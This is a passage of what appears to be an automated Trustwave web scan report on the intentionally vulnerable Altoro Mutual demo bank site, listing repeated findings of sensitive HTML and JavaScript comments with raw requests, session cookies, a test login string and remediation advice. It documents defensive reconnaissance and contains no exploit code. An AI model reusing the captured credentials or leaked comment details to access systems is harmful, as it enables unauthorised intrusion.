JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 309 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 310 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 311 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 312 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 313 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 314 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117:8443/disclaimer.htm?url=http://www.microsoft.c
om
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://65.61.137.117:8443/disclaimer.htm?url=http://www.microsoft.c
om HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 315 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://demo.testfire.net/index.jsp?content=personal.htm
GET - https://demo.testfire.net/index.jsp?content=business.htm
GET - https://demo.testfire.net/subscribe.jsp
POST - https://demo.testfire.net/doSubscribe
GET - https://demo.testfire.net/default.jsp?content=security.htm
GET - https://demo.testfire.net/survey_questions.jsp
GET - https://demo.testfire.net/survey_questions.jsp?step=a
GET - https://demo.testfire.net/status_check.jsp
GET - https://demo.testfire.net/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 316 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://65.61.137.117/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 317 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 318 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 319 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 320 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net:8080/disclaimer.htm?url=http://www.netscape.
com
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 321 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 322 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net:8080/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://demo.testfire.net:8080/sendFeedback HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 323 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 324 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 325 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 326 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://65.61.137.117:8080/disclaimer.htm?url=http://www.netscape.co
m
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
http://65.61.137.117:8080/disclaimer.htm?url=http://www.netscape.co
m HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 327 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://65.61.137.117:8080/disclaimer.htm?url=http://www.microsoft.co
m
1 Javascript Comment(s) found
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 328 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 329 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://65.61.137.117:8080/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 330 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 331 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 332 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 333 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET http://65.61.137.117/search.jsp?query=_WSETESTDATA
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 334 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 335 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 336 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 337 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 338 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 339 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 340 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://65.61.137.117:8443/index.jsp?content=personal.htm
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 341 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 342 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 343 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net:8080/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 344 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 345 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net:8080/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 346 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 347 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 348 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://demo.testfire.net:8443/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 349 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/index.jsp?content=inside_contact.htm
